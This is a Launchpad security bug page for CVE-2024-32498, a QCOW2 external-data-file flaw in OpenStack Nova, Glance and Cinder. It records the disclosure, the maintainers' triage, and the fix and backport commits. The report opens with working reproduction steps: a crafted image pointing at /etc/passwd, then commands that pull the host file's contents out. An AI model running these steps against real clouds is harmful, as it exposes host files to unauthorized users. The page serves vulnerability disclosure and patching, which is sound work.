Ubuntu Cloud Archive

[OSSA-2024-001] Arbitrary file access through QCOW2 external data file (CVE-2024-32498)

Bug #2059809 reported by Martin Kaesberger
376
This bug affects 5 people
Affects Status Importance Assigned to Milestone
Cinder
Fix Released
Critical
Brian Rosmaita
Glance
Fix Released
Critical
Dan Smith
OpenStack Compute (nova)
Fix Released
Critical
Sylvain Bauza
OpenStack Security Advisory
Fix Released
High
Jeremy Stanley
Ubuntu Cloud Archive
Fix Released
Undecided
Unassigned
Antelope
Fix Released
Undecided
Unassigned
Bobcat
Fix Released
Undecided
Unassigned
Caracal
Fix Released
Undecided
Unassigned
Ussuri
Fix Committed
Undecided
Unassigned
Yoga
Fix Released
Undecided
Unassigned

Bug Description

OpenStack has security vulnerability in Nova or Glance, that allows an authenticated attacker to read arbitrary files.
QCOW2 has two mechanisms to read from another file. The backing file issue was reported and fixed with OSSA-2015-014, but the external data file was not discovered.

Steps to Reproduce:

- Create a disk image: `qemu-img create -f qcow2 -o data_file=abcdefghigh,data_file_raw=on disk.qcow2 1G` with `abcdefghigh` a placeholder of the same length as the file to read. `qemu-img` will zero it.
- Replace the filename in the disk image: `sed -i "s#abcdefghigh#/etc/passwd#" disk.qcow2`.
- Upload/register the disk image: `openstack image create --disk-format qcow2 --container-format bare --file "disk.qcow2" --private "my-image"`.
- Create a new instance: `openstack server create --flavor "nano" --image "my-image" "my-instance"`.

With the non-bootable instance there might be two ways to continue:

Option 1:
- Derive a new image: `openstack server image create --name "my-leak" "my-instance"`
- Download the image: `openstack image save --file "leak.qcow2" "my-leak"`
- The file content starts at guest cluster 0

Option 2: (this is untested because I reproduced it only in a production system)
- Reboot the instance in rescue mode: `openstack server rescue --image "cirros-0.6.2-x86_64-disk" "my-instance"`.
- Go to the Dashboard, open the console of the instance and login to the instance.
- Extract content from `/dev/sdb` with `cat /dev/sdb | fold -w 1024 | head -n 32`, `xxd -l 1024 -c 32 /dev/sdb` or similar methods.
- It might be possible to write to the host file. If the disk image is mounted with `qemu-nbd`, writes go through to the external data file.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Since this report concerns a possible security risk, an incomplete
security advisory task has been added while the core security
reviewers for the affected project or projects confirm the bug and
discuss the scope of any vulnerability along with potential
solutions.

description: updated
Changed in ossa:
status: New → Incomplete
Revision history for this message
Jeremy Stanley (fungi) wrote :

My initial impression is that this seems like a fairly similar situation to https://security.openstack.org/ossa/OSSA-2023-002.html in which case we may want to involve the Cinder and Glance security reviewers too, but we'll start with Nova and see where it leads.

Revision history for this message
Dan Smith (danms) wrote :

It's also similar to an earlier one specifically referring to qcow files. We currently protect against the backing file of a qcow pointing somewhere, but it looks like this data_file option provides another route to get similar functionality. We will probably need similar mitigations in the same area we currently have them for backing files in nova, glance, and cinder.

Revision history for this message
Dan Smith (danms) wrote (last edit ):

We're also all (I think) now using oslo.utils/imageutils to probe the qcow files. AFAICT, that does not expose the general list of extra options, so we'll need to augment oslo.utils as well.

EDIT: Yeah, it does, under "format-specific"

Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to nova to detect and reject qcow2 images with data-file set

1 comments hidden view all 440 comments
Revision history for this message
Dan Smith (danms) wrote :

Proposed patch to glance to detect and reject qcow2 images with data-file set

Revision history for this message
Dan Smith (danms) wrote :

I subscribed Brian Rosmaita who can evaluate the cinder impact and also review the glance patch.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Added Eric Harney for cinder.

1 comments hidden view all 440 comments
Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Guess I should state explicitly that this also affects cinder, when it converts an image to raw format to write to a volume.

1 comments hidden view all 440 comments
Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

I agree with the design proposal which is about not accepting an image with a data-file set.
Nova doesn't need to use an external disk for a guest, so we could no longer support it.

I'll look at Dan's patch today.

Revision history for this message
Sylvain Bauza (sylvain-bauza) wrote :

Nova's patch proposed by Dan relies on the same mitigation provided in https://security.openstack.org/ossa/OSSA-2023-002.html where we rely on a metadata that was added in osloutils's imageutils.py module by https://github.com/openstack/oslo.utils/commit/2180db82b605cf84902ee379fffc0b34e17e92c7

This sounds to me the correct approach as we can backport it down to the last Maintained releases but any distro can also backport it further down to Ussuri if they want (exactly like OSSA-2023-002)

+1 on nova-2059809.patch but I'll test it on a dev environment.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: Did you notify any organizations about this other than reporting the bug to us? I just received a request from a public cloud provider for access to the bug report, which means the private embargo has been broken and we probably need to disclose this by switching to our public workflow immediately rather than continuing to work on it in private.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Updated cinder patch to include a release note.

Revision history for this message
Jeremy Stanley (fungi) wrote :

For now I'm subscribing some technical representatives from OVH (the provider on whose behalf I was contacted), on the assumption they were the only outside organization notified, so that they might assist with reviewing and testing the proposed fixes.

Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Arnaud Morin (arnaud-morin) wrote :
Revision history for this message
Martin Kaesberger (mkaesberger) wrote :

Jeremy Stanley: The reference to the production system the report refers to the fact that it was discovered in the OVHcloud. I reported it to them in private first and was referred here.

Revision history for this message
Jeremy Stanley (fungi) wrote :

Thanks for confirming. In this case it seems like we should be able to continue working on this in private for now, with added assistance from folks at OVH.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Dan's glance-2059809.patch LGTM.

Brian Rosmaita (brian-rosmaita)
Changed in cinder:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Brian Rosmaita (brian-rosmaita)
Changed in glance:
status: New → In Progress
importance: Undecided → Critical
assignee: nobody → Dan Smith (danms)
Changed in nova:
status: New → In Progress
Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Nova backport for zed

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2024.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.2

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for 2023.1

Revision history for this message
Dan Smith (danms) wrote :

Glance backport for zed

Revision history for this message
Eric Harney (eharney) wrote :

brian-rosmaita's cinder-2059809.patch from comment #16 looks good to me.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2024.1 (Caracal)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.2 (Bobcat).

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for 2023.1 (Antelope)

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for Zed.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Cinder patch for unmaintained/yoga, as a courtesy.

Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

@arnaud-morin: would you mind deleting your patches so that people don't get confused? Thanks!

Revision history for this message
Jeremy Stanley (fungi) wrote :

Martin Kaesberger: If there's any organization you're affiliated with and you'd like it credited along with your name, please let me know.

Here's a draft impact description, a quick review for any inaccuracies is appreciated so I can request a CVE assignment with it...

title: Arbitrary file access through custom QCOW2 external data

description: >
  Martin Kaesberger reported a vulnerability in QCOW2 image processing for
  Cinder, Glance and Nova. By supplying a specially created QCOW2 image which
  references a specific data file path, an authenticated user may convince
  systems to return a copy of that file's contents from the server resulting in
  unauthorized access to potentially sensitive data. All Cinder deployments are
  affected; only Glance deployments with image conversion enabled are affected;
  all Nova deployments are affected.

affected-products:
  - product: Cinder
    version: '<21.3.3, >=22.0.0 <22.1.2, >=23.0.0 <23.1.1, ==24.0.0'
  - product: Glance
    version: '<25.1.1, ==26.0.0, ==27.0.0, >=28.0.0 <28.0.2'
  - product: Nova
    version: '<26.2.3, >=27.0.0 <27.2.1, >=28.0.0 <28.0.2, >=29.0.0 <29.0.2'

Jeremy Stanley (fungi)
Changed in ossa:
status: Incomplete → Confirmed
importance: Undecided → High
assignee: nobody → Jeremy Stanley (fungi)
status: Confirmed → Triaged
Revision history for this message
Brian Rosmaita (brian-rosmaita) wrote :

Draft description LGTM, and the version lists check out.

Jeremy Stanley (fungi)
Changed in ossa:
status: Triaged → In Progress
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file
+ Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
Sylvain Bauza (sylvain-bauza)
Changed in nova:
importance: Undecided → Critical
assignee: nobody → Sylvain Bauza (sylvain-bauza)
Jeremy Stanley (fungi)
summary: - Arbitrary file access through QCOW2 external data file (CVE-2024-32498)
+ [OSSA-2024-001] Arbitrary file access through QCOW2 external data file
+ (CVE-2024-32498)
Jeremy Stanley (fungi)
description: updated
information type: Private Security → Public Security
OpenStack Infra (hudson-openstack)
Changed in ossa:
status: In Progress → Fix Released
OpenStack Infra (hudson-openstack)
Changed in nova:
status: In Progress → Fix Released
OpenStack Infra (hudson-openstack)
Changed in cinder:
status: In Progress → Fix Released
OpenStack Infra (hudson-openstack)
Changed in glance:
status: In Progress → Fix Released
OpenStack Infra (hudson-openstack)
tags: added: in-unmaintained-zed
360 comments hidden view all 440 comments
Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923724
Committed: https://opendev.org/openstack/nova/commit/eeda7c333c773216c216159926673874ce4843ba
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit eeda7c333c773216c216159926673874ce4843ba
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (master)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923924
Committed: https://opendev.org/openstack/nova/commit/c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Submitter: "Zuul (22348)"
Branch: master

commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2024.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923935
Committed: https://opendev.org/openstack/nova/commit/a8783a767551df3dd943bd862cdba35c51cdb7a6
Submitter: "Zuul (22348)"
Branch: stable/2024.1

commit a8783a767551df3dd943bd862cdba35c51cdb7a6
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923729
Committed: https://opendev.org/openstack/nova/commit/24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to nova (unmaintained/yoga)

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924081

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924082

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/yoga)

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/924084

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.2)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923936
Committed: https://opendev.org/openstack/nova/commit/02147b36d35e1e462e1405c36a2e67a33de806de
Submitter: "Zuul (22348)"
Branch: stable/2023.2

commit 02147b36d35e1e462e1405c36a2e67a33de806de
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923733
Committed: https://opendev.org/openstack/nova/commit/65f0789df05e2ba7f11c0eaf2c6959367acbced2
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to cinder (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/cinder/+/923314
Committed: https://opendev.org/openstack/cinder/commit/4aa6590a483901de64e0d162fff11f3d2d7f9977
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 4aa6590a483901de64e0d162fff11f3d2d7f9977
Author: Brian Rosmaita <email address hidden>
Date: Wed Jun 26 14:09:30 2024 -0400

    CVE-2024-32498: Check for external qcow2 data file

    Adds code to image_utils to check for a qcow2 external data
    file, a recent feature of qemu which we do not support and
    which can be used maliciously.

    Advice from the qemu-img community is that it is dangerous
    to call qemu-img info on untrusted files, so we copy over
    the format_inspector module from Glance. This performs basic
    analysis on the image data file so we can detect problematic
    images before we call qemu-img info to get all the image
    attributes. It is expected that this code will eventually be
    added to oslo so it can be consumed by Glance, Cinder, and
    Nova.

    Because cinder itself may create qcow2 format images with a
    backing file in nfs-based backends, the glance format_inspector
    has been modified to optionally allow such files. Since we are
    monkeying with the format_inspector code, we also copy over
    its unit tests to prevent regressions and to add tests for the
    changed code.

    Includes an additional fix to prevent an issue where a user
    could mount a raw volume and write a qcow2 header with a larger
    virtual size on it. On reattaching the volume it would have the
    new larger virtual size avaialable without actually changing
    the size value in cinder. While we cannot prevent this we can
    prevent the user from using this volume again, which makes this
    exploit pointless.

    Co-authored-by: Dan Smith <email address hidden>
    Co-authored-by: Felix Huettner <email address hidden>

    Change-Id: I65857288b797cde573e7443ac6e7e6f57fedde01
    Closes-bug: #2059809
    (cherry picked from commit d6a186945e03649343af55b46ed8dfe0dd326e40)
    (cherry picked from commit db98dc207060da234c32a563c13cac1edbd62952)
    (cherry picked from commit 9e667b02b2c20b4ada18c1a472be152956284d45)
    (cherry picked from commit 5f5e86e3542866227b7339713148b5169d069f21)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (stable/2023.1)

Reviewed: https://review.opendev.org/c/openstack/nova/+/923937
Committed: https://opendev.org/openstack/nova/commit/47428f6caf503b94583dac614b59971f60a0ba9c
Submitter: "Zuul (22348)"
Branch: stable/2023.1

commit 47428f6caf503b94583dac614b59971f60a0ba9c
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923304
Committed: https://opendev.org/openstack/glance/commit/6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 6a38aef8baaf5caecbd8c866f1cf922d939dfbcc
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 08:06:31 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: I6326a3e85c1ba4cb1da944a4323769f2399ed2c1
    Closes-Bug: #2059809
    (cherry picked from commit 2ca29af4433e9fa99a0a48e230d8d25d6eaa4a87)
    (cherry picked from commit c3586f3a122f6cb0663217b12b52203e74e2e4fa)
    (cherry picked from commit a92c438fb5ba55440b38cae7c8b4361b58daa9dd)
    (cherry picked from commit dba3bdb458aa8a5d0193f12b7f1e374a89ed34a2)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to glance (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/glance/+/923305
Committed: https://opendev.org/openstack/glance/commit/f32d5b8ad865113d499a36f7507a085f583514f9
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit f32d5b8ad865113d499a36f7507a085f583514f9
Author: Dan Smith <email address hidden>
Date: Tue Apr 16 10:29:10 2024 -0700

    Extend format_inspector for QCOW safety

    This adds two properties to the QcowInspector that makes it able to
    indicate whether the file specifies a backing_file or data_file in the
    header. Both conditions are considered unsafe for our usage. To
    ease checking of this condition, a classmethod is added that takes
    a local filename and digests just enough of the file to assert that
    both conditions are false.

    Change-Id: Iaf86b525397d41bd116999cabe0954a0a7efac65
    Related-Bug: #2059809
    (cherry picked from commit ae536bb394793c9a7a219cb498e03d5c81dbbbb7)
    (cherry picked from commit 2eba54e0821106097dfeceb424e53943fd090483)
    (cherry picked from commit 89dbbc838d606f461087e1494d19ddbcf9db0a38)
    (cherry picked from commit 4860024286256b028fabc5ed50274934c3dfdd8a)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/zed)

Related fix proposed to branch: unmaintained/zed
Review: https://review.opendev.org/c/openstack/nova/+/924241

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Related fix proposed to branch: unmaintained/zed
Review: https://review.opendev.org/c/openstack/nova/+/924243

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to cinder (unmaintained/xena)

Fix proposed to branch: unmaintained/xena
Review: https://review.opendev.org/c/openstack/cinder/+/925097

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix proposed to cinder (unmaintained/wallaby)

Fix proposed to branch: unmaintained/wallaby
Review: https://review.opendev.org/c/openstack/cinder/+/925098

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/zed)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924241
Committed: https://opendev.org/openstack/nova/commit/e8f00617ed319aa37f6946cf10883eef6d180612
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit e8f00617ed319aa37f6946cf10883eef6d180612
Author: Sean Mooney <email address hidden>
Date: Thu Jul 4 20:09:31 2024 +0100

    Add iso file format inspector

    This change includes unit tests for the ISO
    format inspector using mkisofs to generate
    the iso files.

    A test for stashing qcow content in the system_area
    of an iso file is also included.

    This change modifies format_inspector.detect_file_format
    to evaluate all inspectors until they are complete and
    raise an InvalidDiskInfo exception if multiple formats
    match.

    Related-Bug: #2059809
    Change-Id: I7e12718fb3e1f77eb8d1cfcb9fa64e8ddeb9e712
    (cherry picked from commit b1cc39848ebe9b9cb63141a647bda52a2842ee4b)
    (cherry picked from commit eeda7c333c773216c216159926673874ce4843ba)
    (cherry picked from commit 24628ecbbe9d5fdd4fe6767ca92395f0d3da9e48)
    (cherry picked from commit 65f0789df05e2ba7f11c0eaf2c6959367acbced2)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/924243
Committed: https://opendev.org/openstack/nova/commit/11613e7b3244958fa8d0b5253a185287d1ade2d8
Submitter: "Zuul (22348)"
Branch: unmaintained/zed

commit 11613e7b3244958fa8d0b5253a185287d1ade2d8
Author: Balazs Gibizer <email address hidden>
Date: Thu Jul 11 07:29:40 2024 +0200

    Stabilize iso format unit tests

    Some version of mkisofs does not properly handle if both the input and
    the output file of the command are the same. So this commit changes the
    unit tests depending on that binary to use a different files.

    Related-Bug: #2059809
    Change-Id: I6924eb23ff5804c22a48ec6fabcec25f061906bb
    (cherry picked from commit c6d8c6972d52845774b36acb84cd08a4b2e4dcde)
    (cherry picked from commit a8783a767551df3dd943bd862cdba35c51cdb7a6)
    (cherry picked from commit 02147b36d35e1e462e1405c36a2e67a33de806de)
    (cherry picked from commit 47428f6caf503b94583dac614b59971f60a0ba9c)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix proposed to nova (unmaintained/yoga)

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/925592

Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Related fix proposed to branch: unmaintained/yoga
Review: https://review.opendev.org/c/openstack/nova/+/925594

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924081
Committed: https://opendev.org/openstack/nova/commit/f844c8fe3ccbf5b477c007ac1d2e290c9d74f2e6
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit f844c8fe3ccbf5b477c007ac1d2e290c9d74f2e6
Author: Dan Smith <email address hidden>
Date: Mon Apr 1 07:32:11 2024 -0700

    Reject qcow files with data-file attributes

    Change-Id: Ic3fa16f55acc38cf6c1a4ac1dce4487225e66d04
    Closes-Bug: #2059809
    (cherry picked from commit ec9c55cbbc91d1f31e42ced289a7c82cf79dc2a2)
    (cherry picked from commit 58d933eafb3f7164419000700a305c8f75d5cb6e)
    (cherry picked from commit 736328f78fb88b6d567b94b50cd14b3ebef08a5e)
    (cherry picked from commit af4d819c606d6662d0b086365a51f5220b596e48)
    (cherry picked from commit d69d441cf5d82f69d8ed7d555a6af73624866400)

tags: added: in-unmaintained-yoga
Revision history for this message
OpenStack Infra (hudson-openstack) wrote :

Reviewed: https://review.opendev.org/c/openstack/nova/+/924082
Committed: https://opendev.org/openstack/nova/commit/b8a3d56f2e27531cc735606fbe92b648a51e8d62
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit b8a3d56f2e27531cc735606fbe92b648a51e8d62
Author: Dan Smith <email address hidden>
Date: Wed Apr 17 07:06:13 2024 -0700

    Check images with format_inspector for safety

    It has been asserted that we should not be calling qemu-img info
    on untrusted files. That means we need to know if they have a
    backing_file, data_file or other unsafe configuration *before* we use
    qemu-img to probe or convert them.

    This grafts glance's format_inspector module into nova/images so we
    can use it to check the file early for safety. The expectation is that
    this will be moved to oslo.utils (or something) later and thus we will
    just delete the file from nova and change our import when that happens.

    NOTE: This includes whitespace changes from the glance version of
    format_inspector.py because of autopep8 demands.

    Conflicts:
      nova/conf/workarounds.py

    NOTE(elod.illes): conflict is due to the following patch that is only
    present in zed: Iab92124b5776a799c7f90d07281d28fcf191c8fe

    Change-Id: Iaefbe41b4c4bf0cf95d8f621653fdf65062aaa59
    Closes-Bug: #2059809
    (cherry picked from commit 9cdce715945619fc851ab3f43c97fab4bae4e35a)
    (cherry picked from commit f07fa55fd86726eeafcd4c0c687bc49dd4df9f4c)
    (cherry picked from commit 0acf5ee7b5dfb6ff0f9a9745f5ad2a0ed2bf65bf)
    (cherry picked from commit 67e5376dd64407f5aaf1ea5f8c896e356064a2c9)
    (cherry picked from commit da352edceb74dbd715268f94516503042b48cc90)

Revision history for this message
OpenStack Infra (hudson-openstack) wrote : Related fix merged to nova (unmaintained/yoga)

Reviewed: https://review.opendev.org/c/openstack/nova/+/924084
Committed: https://opendev.org/openstack/nova/commit/3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Submitter: "Zuul (22348)"
Branch: unmaintained/yoga

commit 3ba8ee16116e6a721413a382bbd4bcb68355cdf0
Author: Dan Smith <email address hidden>
Date: Mon Jul 1 09:06:40 2024 -0700

    Fix vmdk_allowed_types checking

    This restores the vmdk_allowed_types checking in create_image()
    that was unintentionally lost by tightening the
    qemu-type-matches-glance code in the fetch patch recently. Since we
    are still detecting the format of base images without metadata, we
    would have treated a vmdk file that claims to be raw as raw in fetch,
    but then read it like a vmdk once it was used as a base image for
    something else.

    Conflicts:
      nova/tests/unit/virt/libvirt/test_utils.py
      nova/virt/libvirt/utils.py

    NOTE(elod.illes): conflicts are due to patch to consolidate image
    creation functions (I111cfc8a5eae27b15c6312957255fcf973038ddf) is only
    introduced in zed.

    Change-Id: I07b332a7edb814f6a91661651d9d24bfd6651ae7
    Related-Bug: #2059809
    (cherry picked from commit 08be7b2a0dc1d7728d8034bc2aab0428c4fb642e)
    (cherry picked from commit 11301e7e3f0d81a3368632f90608e30d9c647111)
    (cherry picked from commit 70a435fd519a0ebcc3ac9ad5254fefbf19c93e48)
    (cherry picked from commit f732f8476851e6272d8ad9937f54b918795844e8)
    (cherry picked from commit a2acb31d790e6cb41c067bfc0343bde274c9428c)

James Page (james-page)
Changed in cloud-archive:
status: Fix Released → Fix Committed
Revision history for this message
James Page (james-page) wrote :

This bug was fixed in the package glance - 2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0
---------------

 glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1~cloud0) noble-dalmatian; urgency=medium
 .
   * New upstream release for the Ubuntu Cloud Archive.
 .
 glance (2:29.0.0~b2+git2024080717.695fcb67-0ubuntu1) oracular; urgency=medium
 .
   * New upstream snapshot for OpenStack Dalmatian.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/CVE*.patch: Drop, included in snapshot.
 .
 glance (2:28.0.1-0ubuntu3) oracular; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
       data-file attributes.
     - debian/patches/CVE-2024-32498-2.patch: extend format_inspector for
       QCOW safety.
     - debian/patches/CVE-2024-32498-3.patch: add VMDK safety check.
     - debian/patches/CVE-2024-32498-4.patch: reject unsafe qcow and vmdk
       files.
     - debian/patches/CVE-2024-32498-5.patch: add QED format detection to
       format_inspector.
     - debian/patches/CVE-2024-32498-6.patch: add file format detection to
       format_inspector.
     - debian/patches/CVE-2024-32498-7.patch: add safety check and detection
       support to FI tool.
     - CVE-2024-32498

Changed in cloud-archive:
status: Fix Committed → Fix Released
Revision history for this message
James Page (james-page) wrote :

This bug was fixed in the package nova - 3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1~cloud0
---------------

 nova (3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1~cloud0) noble-dalmatian; urgency=medium
 .
   * New upstream release for the Ubuntu Cloud Archive.
 .
 nova (3:29.1.0+git2024080716.bb2d7f9c-0ubuntu1) oracular; urgency=medium
 .
   * New upstream snapshot for OpenStack Dalmatian.
   * d/control: Align (Build-)Depends with upstream.
   * d/p/test-hacking-compat.patch: Drop, included upstream.
   * d/p/oslo.versionedobjects-compat.patch: Drop, similar included
     upstream.
   * d/p/CVE*.patch: Drop, included in snapshot.
 .
 nova (3:29.0.1-0ubuntu4) oracular; urgency=medium
 .
   * SECURITY UPDATE: Arbitrary file access via custom QCOW2 external data
     (LP: #2059809)
     - debian/patches/CVE-2024-32498-1.patch: reject qcow files with
       data-file attributes.
     - debian/patches/CVE-2024-32498-2.patch: check images with
       format_inspector for safety.
     - debian/patches/CVE-2024-32498-3.patch: additional qemu safety
       checking on base images.
     - debian/patches/CVE-2024-32498-4.patch: fix vmdk_allowed_types
       checking.
     - CVE-2024-32498

